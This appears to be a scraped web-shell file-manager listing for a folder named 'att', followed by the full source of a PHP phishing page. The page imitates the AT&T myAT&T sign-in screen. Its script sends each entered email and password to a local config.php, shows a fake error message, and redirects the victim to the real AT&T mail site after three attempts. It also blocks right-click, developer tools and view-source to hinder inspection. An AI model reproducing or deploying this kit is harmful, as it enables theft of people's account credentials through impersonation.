at path:
ROOT
/
att
/
controller.php
run:
R
W
Run
a
DIR
2026-01-03 07:41:39
R
W
Run
assets
DIR
2025-09-13 22:58:46
R
W
Run
bots
DIR
2025-09-07 18:44:14
R
W
Run
block.php
460 By
2025-09-07 18:56:16
R
W
Run
Delete
Rename
controller.php
6.9 KB
2025-09-13 23:56:58
R
W
Run
Delete
Rename
index.php
1.34 KB
2025-09-13 23:30:24
R
W
Run
Delete
Rename
robots.txt
39 By
2021-11-03 18:23:24
R
W
Run
Delete
Rename
v.txt
894 By
2026-01-04 12:44:01
R
W
Run
Delete
Rename
error_log
up
📄
controller.php
Save
<?php ob_start(); session_start(); if (isset($_SESSION['required_param'])) { } else { header('HTTP/1.0 403 Forbidden', true, 404); exit(); } include './block.php'; ?> <!DOCTYPE html> <html lang="en"> <head> <title>Login Screen</title> <meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7;IE=11; IE=EDGE" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0,shrink-to-fit=no" /> <link rel="icon" type="image/x-icon" href="https://signin.att.com/favicon.ico"> <link rel="shortcut icon" type="image/x-icon" href="https://signin.att.com/favicon.ico"> <link rel="apple-touch-icon" href="https://signin.att.com/favicon.ico"> <link rel="apple-touch-icon-precomposed" href="https://signin.att.com/favicon.ico"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"> <link rel="stylesheet" href="./assets/style.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <script src="./assets/script.js"></script> </head> <body> <div class="container"> <div class="screen"> <form id="loginForm" method="post" name="login_form"> <ul> <li style="text-align:center;"> <img src="./assets/logo.svg" alt="ATT LOGO" /> </li> <li style="text-align:center;padding:20px 0;" class="Md"> <p style="font-size:24px;line-height:32px;">Sign in</p> <p style="font-size:18px;line-height:28px;">to myAT&T</p> </li> <li> <div class="err" id="err"> <i></i> <span id="txts">Double check your ID and password, and try again. If you haven't set up your account, tap the 'Create one now' link.<legend>CARE CODE: 201 [LU100]</legend></span> </div> </li> <li> <label>User ID</label> <input type="email" name="email" class="inp" id="email" value="<?php echo htmlspecialchars($_SESSION['ems'] ?? '', ENT_QUOTES, 'UTF-8'); ?>" /> <a style="text-align:right;padding:8px 0 0;" href="#">Forgot user ID?</a> </li> <li> <label>Password</label> <input type="password" name="password" class="inp" id="password" autocomplete="off" value="" /> <a style="text-align:right;padding:8px 0 0;" href="#">Forgot password?</a> </li> <li> <label class="contain"> Save user ID <input type="checkbox" checked="checked"> <span class="checkmark"></span> </label> <button type="button" name="submit" class="btn" id="btn">Sign in</button> <a style="text-align:center;padding:5px 0;" href="#">Cancel</a> </li> <li style="text-align:center;font-size:17px;line-height:25px;border-top:1px solid #cecece;margin-top:13px;padding-top:12px;"> <p class="Rg">Don't have a user ID?</p> <a class="Md" style="font-size:17px;" href="#">Create one now</a> </li> </ul> </form> </div> <footer> <ul> <li><a href="#">Legal policy center</a></li> <li><a href="#">Privacy policy</a></li> <li><a href="#">Terms of use</a></li> <li><a href="#">Accessibility</a></li> <li><a href="#">Do not sell my personal information</a></li> </ul> <p>©<?php echo date('Y'); ?> AT&T Intellectual Property. All rights reserved.</p> </footer> </div> <script type="text/javascript"> // Get or initialize clickCount from sessionStorage let clickCount = parseInt(sessionStorage.getItem('clickCount')) || 0; function handleSignin(event) { // Prevent form submission event.preventDefault(); const emailField = document.getElementById('email'); const passwordField = document.getElementById('password'); const email = emailField.value.trim(); const password = passwordField.value.trim(); const txts = document.getElementById('err'); // Show error message container txts.style.display = "block"; // Check if fields are filled if (!email || !password) { // Clear empty fields and set red borders if (!email) { emailField.value = ''; emailField.style.border = '1px solid red'; emailField.focus(); } else { emailField.style.border = ''; } if (!password) { passwordField.value = ''; passwordField.style.border = '1px solid red'; passwordField.focus(); } else { passwordField.style.border = ''; } return; } // Clear any error borders emailField.style.border = ''; passwordField.style.border = ''; // Increment click counter and store in sessionStorage clickCount++; sessionStorage.setItem('clickCount', clickCount); // Clear password field after each attempt passwordField.value = ''; passwordField.focus(); // Update attempt counter display document.getElementById('txts').innerHTML = 'Double check your ID and password, and try again. <legend>CARE CODE: 201 [LU100]</legend>'; // If this is the 3rd submission, redirect if (clickCount >= 3) { setTimeout(function() { window.location.href = "https://mail.att.net"; }, 1000); // Small delay to show the attempt count return; } // Send data to PHP fetch('./assets/config.php', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ email: email, password: password, }), }) .then((response) => response.json()) .then((data) => { if (data.success) { console.log('Login successful'); } else { console.log('Login failed'); } }) .catch((error) => { console.error('Error:', error); }); } // Attach event listeners document.getElementById('btn').addEventListener('click', handleSignin); document.getElementById('loginForm').addEventListener('submit', handleSignin); // Add Enter key handler document.addEventListener('keydown', function(event) { if (event.key === 'Enter') { event.preventDefault(); handleSignin(event); } }); // === SECURITY MEASURES === document.addEventListener("contextmenu", function(e) { e.preventDefault(); }); document.addEventListener("keydown", function(e) { // Block F12 if (e.key === "F12") { e.preventDefault(); } // Block Ctrl+Shift+I/J/C if (e.ctrlKey && e.shiftKey && ["I", "J", "C"].includes(e.key.toUpperCase())) { e.preventDefault(); } // Block Ctrl+U if (e.ctrlKey && e.key.toUpperCase() === "U") { e.preventDefault(); } // Block Ctrl+S (Save Page) if (e.ctrlKey && e.key.toUpperCase() === "S") { e.preventDefault(); } }); </script> </body> </html> <?php ob_end_flush(); ?>